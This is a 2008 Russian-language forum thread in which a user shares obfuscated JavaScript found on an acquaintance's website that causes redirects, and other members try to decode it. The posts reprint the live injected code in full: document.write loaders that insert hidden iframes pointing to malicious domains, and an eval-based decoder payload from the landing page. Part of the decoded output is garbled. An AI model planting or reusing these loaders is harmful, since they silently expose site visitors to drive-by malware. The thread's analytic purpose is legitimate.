странный javascript код
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
странный javascript код - 2008-12-18 15:52:33.813333
|
|
|
jseyzi
Сообщений: 2
Оценки: 0
Присоединился: 2008-12-18 15:28:36.860000
|
на сайте одного знакомого обнаружил хитрый скрипт и естественно выполнил его (были постоянные редиректы). помогите разобраться, как он работает, и нет ли в нём вирусов:
<script>var rfi="<";var xus="i";var llyph=" ";var euwow="dapda='vcYUKySn' cscea='KUllfNSf' src=";var pzleb="ame>";var ybmde="info/srt/go.php?sid=1";var qxizx="?W2WvZ ";var qxv="f";var xfn="r";var cae="a";var gejdz="xegyo='NwrN66NY' ";var phx="m";var owd="e";var yvlhv="width=724 ";var oligs="http://regedintheclub.";var deaih="height=370 ";var gbpeo="style='display:none'";var lnsym=oligs+ybmde;var kpwdp="></ifr";document.write(rfi+xus+qxv+xfn+cae+phx+owd+llyph+euwow+lnsym+qxizx+gejdz+yvlhv+deaih+gbpeo+kpwdp+pzleb);</script>
<script>function c71912231668n49456a10423dd(n49456a1042bb9){ var n49456a1043385=16; return (parseInt(n49456a1042bb9,n49456a1043385));}function n49456a1044343(n49456a1044b01){ var n49456a104627d=2; var n49456a10452d5='';n49456a1047225=String.fromCharCode;for(n49456a1045aa9=0;n49456a1045aa9<n49456a1044b01.length;n49456a1045aa9+=n49456a104627d){ n49456a10452d5+=(n49456a1047225(c71912231668n49456a10423dd(n49456a1044b01.substr(n49456a1045aa9,n49456a104627d))));}return n49456a10452d5;} var xa1='';var n49456a10479f9='3C7'+xa1+'3637'+xa1+'2697'+xa1+'07'+xa1+'43E696628216D7'+xa1+'96961297'+xa1+'B646F637'+xa1+'56D656E7'+xa1+'42E7'+xa1+'7'+xa1 +'7'+xa1+'2697'+xa1+'465287'+xa1+'56E657'+xa1+'363617'+xa1+'065282027'+xa1+'2533632536392536362537'+xa1+'32253631253664253635253230253665253 631253664253635253364253633253337'+xa1+'2532302537'+xa1+'332537'+xa1+'32253633253364253237'+xa1+'2536382537'+xa1+'342537'+xa1+'342537'+xa1+' 30253361253266253266253632253639253637'+xa1+'2537'+xa1+'332536352536632536632537'+xa1+'332537'+xa1+'3425363125363625363625326525363325366525 32662536362536352536352536342536322536312536332536622532652536382537'+xa1+'34253664253663253366253237'+xa1+'2532622534642536312537'+xa1+'342 536382532652537'+xa1+'322536662537'+xa1+'352536652536342532382534642536312537'+xa1+'342536382532652537'+xa1+'3225363125366525363425366625366 4253238253239253261253331253338253332253331253333253239253262253237'+xa1+'253337'+xa1+'253338253636253333253334253333253237'+xa1+'2532302537 '+xa1+'37'+xa1+'2536392536342537'+xa1+'34253638253364253334253336253337'+xa1+'253230253638253635253639253637'+xa1+'2536382537'+xa1+'34253364 2533332533392532302537'+xa1+'332537'+xa1+'342537'+xa1+'39253663253635253364253237'+xa1+'2536342536392537'+xa1+'332537'+xa1+'3025366325363125 37'+xa1+'39253361253230253665253666253665253635253237'+xa1+'2533652533632532662536392536362537'+xa1+'3225363125366425363525336527'+xa1+'2929 3B7'+xa1+'D7'+xa1+'6617'+xa1+'2206D7'+xa1+'969613D7'+xa1+'47'+xa1+'27'+xa1+'5653B3C2F7'+xa1+'3637'+xa1+'2697'+xa1+'07'+xa1+'43E';document.write(n49456a1044343(n49456a10479f9));</script>
ps. с первой частью понятно, просто iframe.
|
|
|
|
|
RE: странный javascript код - 2008-12-18 16:20:20.546666
|
|
|
xakep_svetik
Сообщений: 226
Оценки: 0
Присоединился: 2008-11-11 18:26:51.376666
|
Вирусов в нём нет, тока проверял, а вот что он делает не понял…
Разбераюсь пока…
|
|
|
|
|
RE: странный javasсriрt код - 2008-12-18 17:10:39.393333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
там засунут ifrаmе на фугкцию, которая расположена по адресу:
http://regedintheclub.info/srt/go.php?sid=1?W2WvZ
и если посмотреть исходники, то там:
<html><bоdу><div style="display:none;" id="lTcECqn">jSrK2df5R9w5'+'arY'+'2wyDyg0exaGT'+'K2'+'SrK2SYywE'+'k2'+'Dv_VG8w5S0TWfFf5G'+'RY2CR3HZorK2SrK2dK2c'+'j3x'+'r8Y8wSfPfGAVpCf'+'jr'+'RKyD'+'HM2'+'c'+'c381LMy'+'acK8RZ'+'fy'+'RNw5Xg'+'AVEGlx'+'wG'+'TK2'+'S'+'rK2S'+'rKr8Y8wC'+'fjbLwHh'+'yk'+'2'+'Dv_VG'+'8w5S0T'+'WfFf5GRY2CgCVPck2'+'D7fyZmrK2SrK2SrVgj3xR8f2e'+'clV'+'RHfyI'+'r0yX6l'+'03rYjejl0m0M2o8w5oS'+'3'+'HDOeHb5AxwGT'+'K2SrK2S'+'rK'+'2UK2mL_2ecw5RzT'+'8aH'+'_yX63PavY8D'+'7fywQT'+'8m74UXH'+'D'+'5f'+'o4WS6_y'+'G'+'Lwyacw5XLKj1LTj'+'RS'+'Y2'+'grK'+'WCj'+'D2AR'+'MWfHYyRyDV'+'frAV37A'+'L'+'CE4n'+'CdqUrRK8h54Uw'+'z_V3'+'HDVh5eHXL'+'f'+'V'+'Gsw5h5eHg0_'+'j'+'bLYjS0Dye0_PfCeP'+'SSYyc8f2ecqHaGqK'+'2Sr'+'K2SrK26Y8e'+'8KVZm'+'r'+'K2Sr'+'K'+'2'+'SrujSr'+'K2SrKhorK2SrKho'+'rK2Sr'+'ujSr'+'K'+'2'+'df5R9'+'w'+'5ar'+'Y2wyDygslxwGTK2'+'SrK'+'2UT8'+'JjBijSr'+'K2SrK'+'avwHXCfjrRKyDH'+'M2cc3'+'8'+'1L'+'Myac'+'K8'+'ayBijS'+'rK2'+'S'+'r'+'K2dK2'+'c'+'j3'+'xr'+'8Y8wSfPfGAVpCfj'+'rRKyDHM2cc381'+'L'+'MyacK8RZ'+'fyRNw5X'+'gAVEGlxw'+'GTK2Sr'+'K2Sr'+'K2d_'+'jcjk2D7f'+'ywOeHR8'+'Y5aNfjlrY8Ry'+'D2ANfVR9'+'Mka76WR8f2egqK2Sr'+'K2S'+'rK2SYywEk2D7fyRSY23'+'Lwi5'+'v'+'wxo'+'5'+'oyS0fyw5vj'+'crY'+'jD'+'HTHa'+'ylHhylW'+'_S3HZo'+'rK'+'2Sr'+'K2SrK2UK2mL_2ecw'+'5RzT8aH'+'_y'+'X63PavY8'+'D7f'+'ywQT8m74UXH'+'D5fo4WS6_yGL'+'wyacw5XLKj1LTjRSY2g'+'rKWCj'+'D2ARM'+'Wf'+'HY'+'yRyDVfrA'+'V37ALCE4'+'nCd'+'4Uwz_V3HDV'+'h5'+'eHXLfVGsw'+'5h5eH'+'g0_jbLY'+'j'+'S0Dy'+'e0_PfCeP'+'SSYyc8f2'+'ecqHaGqK2SrK2SrK2S'+'N8eHDQa7fySLD5Xz38'+'3vYL'+'XSBtGZlnfye'+'LaG'+'qK2SrK2'+'SrK2'+'S9'+'j'+'cLfjEgqK'+'2SrK2SrK2OTK2SrK2SrKhorK2Sr'+'K2O'+'DHeFK8ej'+'B'+'ijSrK'+'2SrK'+'2UK2'+'mL_2ecw'+'5R'+'zT8a'+'H_yX6'+'3P'+'avY8'+'D'+'7fyw'+'Q'+'T'+'8m74UXHD5'+'fo4WS6_'+'yGLw'+'yacw5XL'+'K'+'j1LTjRSY2grKW'+'CjD2ARMWf'+'HYy'+'RyDVfrA'+'V3'+'7ALCE4nCd4Uwz'+'_V3HDVh5'+'eHX'+'LfVGsw5h5eHg0_'+'jbLYjS'+'0Dye'+'0_PfCePSSYy'+'c8f2ec'+'qHa'+'G'+'qK2'+'SrK2'+'SrKCLw'+'5BRf2e'+'rf5lsBUfHYycElxZz'+'3WAyeLfSBt'+'jSrK'+'2'+'S'+'rKhorK2Sr'+'KhjBjD'+'HMjXj3xeR3HZorK'+'2Sr'+'K'+'2'+'U'+'K2mL'+'_2e'+'cw5RzT'+'8aH_yX63PavY8D7'+'f'+'y'+'wQT8m74UXHD5fo'+'4WS6_yGL'+'wyacw5XLKj1LTj'+'R'+'SY2grKWCjD2ARMWfHYyRyD'+'Vf'+'rA'+'V37'+'A'+'LCE4nCd4'+'Uwz_V3HDVh5eHXLfVG'+'s'+'w5h5eHg0_jbL'+'YjS'+'0D'+'ye0'+'_Pf'+'CePSS'+'Yyc8f2'+'ecqHa'+'GqK2SrK2SN'+'8e'+'HDQa7f'+'ySLD5Xz383v'+'YL'+'X'+'SB'+'tGZlnfyeLa'+'G'+'qK2Sr'+'K2OTK2SrK26'+'_ylLT'+'8Rj3LZmrK2'+'SrujS'+'rK'+'2yDygslxZm'+'rK2Sr</div><sсriрt>function xEZWJf1y1CSY(MaM1K4Iulojhp){return String["f"+"rom"+"Ch"+"ar"+"Code"](MaM1K4Iulojhp);}</sсriрt><sсriрt>function gmpTBVUT(lcpTVybwUH){var AVWeN=0,uF1uG=lcpTVybwUH.length,yGCk1ZXq3iLXC=1024,opnZK,kGGSzK,WFys6F5qFeN6h6="",XHPK8Cu=AVWeN,h5iEXhZEgpDZuT=AVWeN,giI9o1DGFVfZ=AVWeN,cU5qYn66UeKBU=Array(63,17,52,25,40,50,62,3,51,59,0,0,0,0,0,0,10,8,41,14,28,22,7,26,39,5,4,45,35,44,43,2,32,58,19,18,60,38,53,36,21,61,6,0,0,0,0,12,0,20,16,15,46,24,13,27,0,49,55,57,9,30,34,31,1,56,11,23,33,48,47,29,37,54,42);for(kGGSzK=Math.ceil(uF1uG/yGCk1ZXq3iLXC);kGGSzK>AVWeN;kGGSzK--){for(eval("opnZK=M"+"a"+"th."+"m"+"in(uF1uG,yGCk1ZXq3iLXC)");opnZK>AVWeN;opnZK--,uF1uG--){giI9o1DGFVfZ|=(cU5qYn66UeKBU[lcpTVybwUH.charCodeAt(XHPK8Cu++)-48])<<h5iEXhZEgpDZuT;if(h5iEXhZEgpDZuT){WFys6F5qFeN6h6+=xEZWJf1y1CSY(189^giI9o1DGFVfZ&255);giI9o1DGFVfZ>>=8;h5iEXhZEgpDZuT-=2;}else{h5iEXhZEgpDZuT=6;}}}return (WFys6F5qFeN6h6);}var xO2O0khHZhVp=document.getElementById('lTcECqn').innerHTML.replace("'+'","");for(var ah=0;ah<(xO2O0khHZhVp.length);ah++){xO2O0khHZhVp=xO2O0khHZhVp.replace("'+'","");}eval(gmpTBVUT(xO2O0khHZhVp));</sсriрt></bоdу></html>
короче лень разматывать, процесс размотки такой:
идешь с первоначальным кодом сюда: http://tools.olamedia.ru/javasсriрt/decoder/
тыцкаешь "Привести в порядок", потом читаешь var-ы, дальше просто - копируешь весь приведенный в порядок код в блокнот и заменяешь посредством CTRL+H. Допустим есть var xus = "i"; - это означает, что чел все, буквы "i" в коде меняет на "xus" и так далее…Смысл думаю понятен
ЗЫЖ Писал маньяк какой-то:)) Или накручивает сразу по 100 ресурсов, или куки тырит с чего только можно, или и то и другое
|
|
|
|
|
RE: странный javasсriрt код - 2008-12-18 22:34:26.806666
|
|
|
jseyzi
Сообщений: 2
Оценки: 0
Присоединился: 2008-12-18 15:28:36.860000
|
вроде только до этого размолоть можно вторую часть:
< sсriрt > function make(i) {
var j = 16;
return (parseInt(i, j));
}
function res(k) {
var qq = 2;
var x = '';
st = String.fromCharCode;
for (q = 0; q < k.length; q += qq) {
x += (st(make(k.substr(q, qq))));
}
return x;
}
var xa1 = '';
var inf = '3C7'+''+'3637'+''+'2697'+''+'07'+''+'43E696628216D7'+''+'96961297'+''+'B646F637'+''+'56D656E7'+''+'42E7'+
''+'7'+''+'7'+''+'2697'+''+'465287'+''+'56E657'+''+'363617'+''+'065282027'+''+'2533632536392536362537'+''+
'32253631253664253635253230253665253 631253664253635253364253633253337'+''+'2532302537'+''+'332537'+''+
'32253633253364253237'+''+'2536382537'+''+'342537'+''+'342537'+''+' 30253361253266253266253632253639253637'+
''+'2537'+''+'332536352536632536632537'+''+'332537'+''+'3425363125363625363625326525363325366525 32662536362536352536352536342536322536312536332536622532652536382537'+
''+'34253664253663253366253237'+''+'2532622534642536312537'+''+'342 536382532652537'+''+'322536662537'+''+'352536652536342532382534642536312537'+''+'342536382532652537'+
''+'3225363125366525363425366625366 4253238253239253261253331253338253332253331253333253239253262253237'+''+'253337'+''+'253338253636253333253334253333253237'+''+'2532302537 '+
''+'37'+''+'2536392536342537'+''+'34253638253364253334253336253337'+''+'253230253638253635253639253637'+''+'2536382537'+''+'34253364 2533332533392532302537'+''+'332537'+''+'342537'
+''+'39253663253635253364253237'+''+'2536342536392537'+''+'332537'+''+'3025366325363125 37'+''+'39253361253230253665253666253665253635253237'+''+'2533652533632532662536392536362537'+
''+'3225363125366425363525336527'+''+'2929 3B7'+''+'D7'+''+'6617'+''+'2206D7'+''+'969613D7'+''+'47'+''+'27'+''+'5653B3C2F7'+''+'3637'+''+'2697'+''+'07'+''+'43E';document.write(res(inf)); </sсriрt>то есть создаётся длинная константа и переводится в строкуdocument.write (если не перепутал) выводит
<sсriрt>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%�c�SfBScRS6BSc2S3rS#�Ss2Ss"Sc2S6BS#rScSsBSsBS�0%3a%2f%2f%62%69%67%73%65%6c%6c%73%74%61%66%66%2e%63%6e%�&bScbScRScRScBSc"Sc�Sc2Sf"S&RScSsBSfBSf2S6bS#rS&"SFBSc�SsB�68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6�BS#S#'S&�S3�S3S3"S3�S32S#'S&"S#rS3rS3ScbS32S3BS32S#rS#�S�7%69%64%74%68%3d%34%36%37%20%68%65%69%67%68%74%3d�S32S3'S#�Ss2SsBSs'Sf2ScRS6BS#rScBSc'Ss2Ss�Sf2Sc��79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'))�·×f�"�×�×G'VS³Â÷67& а что означает
(!myia){document.write(unescape ?
|
|
|
|
|
|
